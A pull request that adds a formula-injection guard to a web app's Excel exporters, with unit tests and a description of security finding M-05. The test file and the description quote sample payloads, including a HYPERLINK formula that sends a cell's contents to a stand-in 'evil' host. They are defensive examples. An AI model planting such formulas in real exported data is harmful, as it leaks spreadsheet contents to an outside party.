### PR TITLE
fix(ui): neutralize Excel formula injection in exporters (M-05)

### DIFF
--- a/app/ui/src/utils/excelHelpers.js
+++ b/app/ui/src/utils/excelHelpers.js
@@ -1,5 +1,15 @@
 export { formatDateOnly as formatDate } from './formatters';
 
+// Excel/CSV formula-injection guard (security finding M-05). A cell whose text
+// starts with = + - @ (or a leading tab/CR) is interpreted as a formula by
+// spreadsheet apps. Synced display names / descriptions are externally
+// influenced, so prefix a single quote to force literal text. Non-string values
+// (numbers, rich-text/formula objects) pass through unchanged.
+export function safeCell(value) {
+  if (typeof value === 'string' && /^[=+\-@\t\r]/.test(value)) return `'${value}`;
+  return value;
+}
+
 export function hexToArgb(hex) {
   const clean = hex.replace('#', '');
   if (clean.length === 6) return 'FF' + clean.toUpperCase();

--- a/app/ui/src/utils/excelHelpers.test.js
+++ b/app/ui/src/utils/excelHelpers.test.js
@@ -1,0 +1,24 @@
+import { describe, it, expect } from 'vitest';
+import { safeCell } from './excelHelpers';
+
+describe('safeCell — Excel/CSV formula-injection guard (M-05)', () => {
+  it('prefixes a single quote on values starting with a formula trigger', () => {
+    for (const v of ['=HYPERLINK("http://evil")', '+1+1', '-2+3', '@SUM(A1)', '\tcmd', '\rfoo']) {
+      expect(safeCell(v)).toBe(`'${v}`);
+    }
+  });
+
+  it('leaves ordinary display names / descriptions unchanged', () => {
+    for (const v of ['Domain Admins', 'GG_ROL_AD_Finance', 'Finance (EU) — read only', '', 'a=b']) {
+      expect(safeCell(v)).toBe(v);
+    }
+  });
+
+  it('passes non-string values (numbers, null, rich-text objects) through untouched', () => {
+    expect(safeCell(42)).toBe(42);
+    expect(safeCell(null)).toBe(null);
+    expect(safeCell(undefined)).toBe(undefined);
+    const rich = { richText: [{ text: '=x' }] };
+    expect(safeCell(rich)).toBe(rich);
+  });
+});

--- a/app/ui/src/utils/exportAccessPackagesToExcel.js
+++ b/app/ui/src/utils/exportAccessPackagesToExcel.js
@@ -1,5 +1,5 @@
 import ExcelJS from 'exceljs';
-import { formatDate, thinBorder, setHeaderCell } from './excelHelpers';
+import { formatDate, thinBorder, setHeaderCell, safeCell } from './excelHelpers';
 
 // Fetch all APs matching current filters (up to 2000)
 async function fetchAllPackages(authFetch, { search, categoryFilter, sortCol, sortDir }) {
@@ -117,7 +117,7 @@ export async function exportAccessPackagesToExcel({ authFetch, search, categoryF
       // AP detail columns — copy value into every row
       apValues.forEach((val, c) => {
         const cell = ws.getCell(rowNum, c + 1);
-        cell.value = val;
+        cell.value = safeCell(val);
         cell.font = { size: 11 };
         cell.border = thinBorder();
         if (c === 4) cell.alignment = { horizontal: 'center', vertical: 'top' };
@@ -137,12 +137,12 @@ export async function exportAccessPackagesToExcel({ authFetch, search, categoryF
         }
 
         const groupCell = ws.getCell(rowNum, AP_COL_COUNT + 1);
-        groupCell.value = groupName;
+        groupCell.value = safeCell(groupName);
         groupCell.font = { size: 11 };
         groupCell.border = thinBorder();
 
         const roleCell = ws.getCell(rowNum, AP_COL_COUNT + 2);
-        roleCell.value = roleName;
+        roleCell.value = safeCell(roleName);
         roleCell.font = { size: 11 };
         roleCell.border = thinBorder();
         if (roleName === 'Owner') {

--- a/app/ui/src/utils/exportToExcel.js
+++ b/app/ui/src/utils/exportToExcel.js
@@ -1,6 +1,6 @@
 import ExcelJS from 'exceljs';
 import { TYPE_COLORS as TYPE_COLORS_SRC, AP_COLORS } from './colors';
-import { hexToArgb, thinBorder, setHeaderCell } from './excelHelpers';
+import { hexToArgb, thinBorder, setHeaderCell, safeCell } from './excelHelpers';
 
 /**
  * Exports the matrix view to an Excel workbook matching the on-screen layout.
@@ -118,7 +118,7 @@ export async function exportToExcel({ users, orderedGroups, memberships, managed
 
   for (let u = 0; u < userCount; u++) {
     const cell = ws.getCell(2, infoColCount + u + 1);
-    cell.value = users[u].displayName;
+    cell.value = safeCell(users[u].displayName);
     cell.font = { size: 11, bold: false };
     cell.alignment = { textRotation: 90, vertical: 'bottom', horizontal: 'center' };
     cell.fill = {
@@ -132,7 +132,7 @@ export async function exportToExcel({ users, orderedGroups, memberships, managed
   // Row 2 access package name headers (each AP gets a distinct color)
   for (let a = 0; a < apCount; a++) {
     const cell = ws.getCell(2, apColStart + a);
-    cell.value = accessPackages[a].displayName;
+    cell.value = safeCell(accessPackages[a].displayName);
     cell.font = { size: 11, bold: false };
     cell.alignment = { textRotation: 90, vertical: 'bottom', horizontal: 'center' };
     cell.fill = {
@@ -151,12 +151,12 @@ export async function exportToExcel({ users, orderedGroups, memberships, managed
 
     // Info columns: Resource Name | Type | GUID
     const nameCell = ws.getCell(rowNum, 1);
-    nameCell.value = group.displayName;
+    nameCell.value = safeCell(group.displayName);
     nameCell.font = { size: 11 };
     nameCell.border = thinBorder();
 
     const typeCell = ws.getCell(rowNum, 2);
-    typeCell.value = group.groupType || '';
+    typeCell.value = safeCell(group.groupType || '');
     typeCell.font = { size: 11, color: { argb: 'FF6B7280' } };
     typeCell.border = thinBorder();
 
@@ -223,7 +223,7 @@ export async function exportToExcel({ users, orderedGroups, memberships, managed
     countCell.border = thinBorder();
 
     const descCell = ws.getCell(rowNum, metaColStart + 1);
-    descCell.value = group.description;
+    descCell.value = safeCell(group.description);
     descCell.font = { size: 11 };
     descCell.border = thinBorder();
 

--- a/changes/excel-formula-injection.md
+++ b/changes/excel-formula-injection.md
@@ -1,0 +1,1 @@
+- Security: Excel exports (matrix and access-package workbooks) now neutralize spreadsheet formula injection — synced display names, group/role names, and descriptions that begin with `=`, `+`, `-`, or `@` (or a tab/return) are written as literal text, so a maliciously named group can't turn into an executable formula when the exported file is opened.


### PR DESCRIPTION
## Finding M-05 — Excel/CSV formula injection (Medium)

The matrix and access-package Excel exporters wrote externally-influenced strings (synced display names, group/role names, descriptions) straight into worksheet cells. Spreadsheet apps interpret a cell beginning with `=`, `+`, `-`, `@` (or a leading tab/CR) as a **formula**, so an attacker-influenced group name like `=HYPERLINK("http://evil/?leak="&A1)` could execute when an analyst opens the exported file (CSV Injection / Formula Injection, OWASP).

## Fix
- Add a shared `safeCell()` guard in `excelHelpers.js` — values matching `/^[=+\-@\t\r]/` are prefixed with a single quote so the spreadsheet treats them as literal text. Numbers, `null`/`undefined`, and rich-text objects pass through untouched.
- Apply `safeCell()` to every externally-influenced string cell in `exportToExcel.js` (5 sites) and `exportAccessPackagesToExcel.js` (3 sites). Static headers and numeric/computed cells are unaffected.
- Unit tests in `excelHelpers.test.js` covering triggers, normal values, and non-strings.

## Scenario safety
Pure output-encoding change in the UI export path — no effect on no-auth, Azure Postgres, or any deployment mode; strictly increases safety everywhere.

🤖 Generated with [Claude Code](https://claude.com/claude-code)